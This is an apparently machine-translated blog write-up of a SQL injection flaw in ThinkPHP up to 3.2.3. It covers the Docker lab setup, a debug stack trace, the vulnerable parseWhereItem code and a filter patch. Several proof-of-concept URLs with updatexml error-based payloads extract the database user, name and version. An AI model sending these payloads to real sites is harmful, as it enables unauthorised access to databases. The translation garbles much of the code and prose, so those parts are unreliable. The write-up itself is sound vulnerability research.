ref:thinkphp builder.php SQL Injection Vulnerability (<= 3.2.3)

thinkphp builder.php SQL Injection Vulnerability (<= 3.2.3)

ref:https://www.jianshu.com/p/18d06277161e

Timeshu2018.04.21 02:03* Word count 761 Read the comments 2 likes 0

thinkphp builder.php SQL Injection Vulnerability <= 3.2.3 A vulnerability recurrence job

-------------------------------------------------------------

1. Enter Docker internal Environment Description Service Docker start;docker PS, List current container docker exec-it 9b96ee2b/bin/bash;//9b96ee2b to container_id 2. Actual debug stack and parameter passing:/var/www/html# more index.php//Open debug mode recommend the development phase to open the deployment phase comments or set to false; easy to print logs. Define (' App_debug ', True); The following is a debug update injection analysis based on the Docker environment provided by Timeshu.

This is the POC:Http://192.168.3.6/home/index/readcategorymsg?category[0]=bind&category[1]=0%20and (Updatexml (1, Concat (0x7e, (User ())), 0))

Category is an array:
0: "Bind"
1: "0 and (Updatexml (1,concat (0x7e, (User ())), 0)"

Error stack information:
#0/var/www/html/thinkphp/library/think/db/driver.class.php: E (' 1105:xpath synt ... ').
#1/var/www/html/thinkphp/library/think/db/driver.class.php (237): Think\db\driver->error ()
#2/var/www/html/thinkphp/library/think/db/driver.class.php (906): Think\db\driver->execute (' UPDATE ' Vulapps ... ', false)
UPDATE ' vulapps_message ' SET ' is_read ' = ' 1 ' WHERE ' category ' = ' 1 ' and (Updatexml (1,concat (0x7e, (User ())), 0)// Although the preceding is false, the latter is still to be executed. This error: XPATH syntax error: ' [email protected] '.

/var/www/html/thinkphp/library/think/db/driver.class.php (906): Public Function Update ($DATA, $options)
SQL statement: Return $this->execute ($sql,!empty ($options [' fetch_sql '])? true:false);

UPDATE ' vulapps_message ' SET ' Is_read ' =:0 WHERE ' category ' =: 0 and (Updatexml (1,concat (0x7e, (User ())), 0))

Vulnerability Code:

protected function Parsewhereitem ($key, $val)//category,array (2) {[0]= ...
if (Is_array ($val)) {
if (is_string ($val [0])) {
$exp = strtolower ($val [0]);//array (2) {[0]=> string (4) "B IND "[1]=> string" 0 and (Updatexml (1,concat (0x7e, (User ())), 0) "}, Exp=bind
}elseif (' bind ' = = $exp) {//
$whereStr. = $key. ' =: '. $val [1];//$whereStr. =category=:0 and (Updatexml ...) Here will: 0 stitching in, for the back PDO parameter replacement to create the opportunity.
Here you can see that if the where is an array, and the first element is bind, then the concatenation operation is done directly, analyzing here we look at the I-function filtering restrictions and do not exclude bind.

#3/var/www/html/thinkphp/library/think/model.class.php (451): Think\db\driver->update (array, array)
$result = $this->db->update ($data, $options);
echo Var_dump ($data):
Array (1) {["Is_read"]=> int (1)} array (3) {["where"]=> Array (1) {["category"]=> Array (2) {[0]=> string (4) "Bind" [1]=> string "0 and (Updatexml (1,concat (0x7e, (User ())), 0)"}} ["Table"]=> string () "Vulapps_message "[" Model "]=> string (7)" Message "}

#4/var/www/html/application/home/controller/indexcontroller.class.php: Think\model->save (Array)
Public Function readcategorymsg () {
$condition [' category '] = I ("category");
$data [' is_read '] = 1;
$res = M ("message")->where ($condition)->save ($data);
Echo var_dump ($condition [' Category ']). " <br> ";
Array (2) {[0]=> string (4) "bind" [1]=> string "0 and (Updatexml (1,concat (0x7e, (User ())), 0)"}

#5 [Internal function]: home\controller\indexcontroller->readcategorymsg ()
#6/var/www/html/thinkphp/library/think/app.class.php (173):

Patch method: Add bind filtering in the I function.

function think_filter(& $value) { if (Preg_match ('/^ (exp| neq| Gt| Egt|lt| elt|or| xor| like| notlike| Not between| notbetween| between| notin| Not in| in| BIND) $/i ', $value)) {$value. = ';}

-------------------------------------------------------------

Vulnerability Environment: Docker

Vulnerability Analysis

First, we know that the Insert method has a vulnerability, so look at the specific implementation of the Insert method.

The method is located in the thinkphp\library\think\db\builder.php file, and we can see that the Parsedata method was called at the beginning of the function and passed $data as a parameter, and the $data value is our The Get method passes in the data of an array type, such as:

We follow the Parsedata method, which is also in the thinkphp\library\think\db\builder.php file.

As you can see, there is a switch statement at the end, and after entering the statement, it jumps to Case ' Inc ' where the key is to see if $this->parsekey has filtered the $val [1] variable;

Because the $val[1] variable is the updatexml in our payload (1,concat (0x7,user (), 0x7e), 1), such as:

Continue to follow the Parsevalue method, you will find that the incoming $key returned directly, without any filtering.

Let's go back to the first insert method, plus the debug statement, to see what the SQL statement looks like, like this:

The injection of another update function is similar to this insert.

Using Docker to build a vulnerability environment

1. Pull the image to the local

Docker Pull Medicean/vulapps:t_thinkphp_1

2. Start the Environment

Docker run-d-P 80:80 medicean/vulapps:t_thinkphp_1

-P 80:80 The front 80 represents the port of the physical machine, optionally specified.

Use and utilization

Access http://192.168.0.104:80/, assuming a port number of 80 is started

The environment has been built successfully.

Click Mark Read: You can use the burp grab to get the URL

Http://192.168.0.104/Home/Index/readcategorymsg?category=%E7%B3%BB%E7%BB%9F%E6%B6%88%E6%81%AF

Where the vulnerability exists: CATEGORY=%E7%B3%BB%E7%BB%9F%E6%B6%88%E6%81%AF

Poc:

Http://192.168.0.104/home/index/readcategorymsg?category[0]=bind&category[1]=0 and (Updatexml (1,concat (0x7e, (User ())), 0))

Use the POC above to get the database user name directly

Burst Database user name: [email protected]

Http://192.168.0.104/home/index/readcategorymsg?category[0]=bind&category[1]=0 and (Updatexml (1,concat (0x7e, (Database ())), 0))

through Database (), the error echo back to one of the databases: Vulapps

Http://192.168.0.104/home/index/readcategorymsg?category[0]=bind&category[1]=0 and (Updatexml (1,concat (0x7e, (version ())), 0))

Burst database version: 5.5.57-0ubuntu0.14.04.1

Online to find some information, but still not very understand this, would like to construct a statement to see if you can get to the database account and password, the results found unable to use (embarrassed.)

The above POC is not very understanding, can only be seen through the user () here to modify can get to the database user and version

Resources:

Https://mp.weixin.qq.com/s/lNaH2-AAtk9JVKbbCBeIRA

Https://mp.weixin.qq.com/s/4xXS7usHMFNgDTEHcHBcBA

ref:thinkphp builder.php SQL Injection Vulnerability (<= 3.2.3)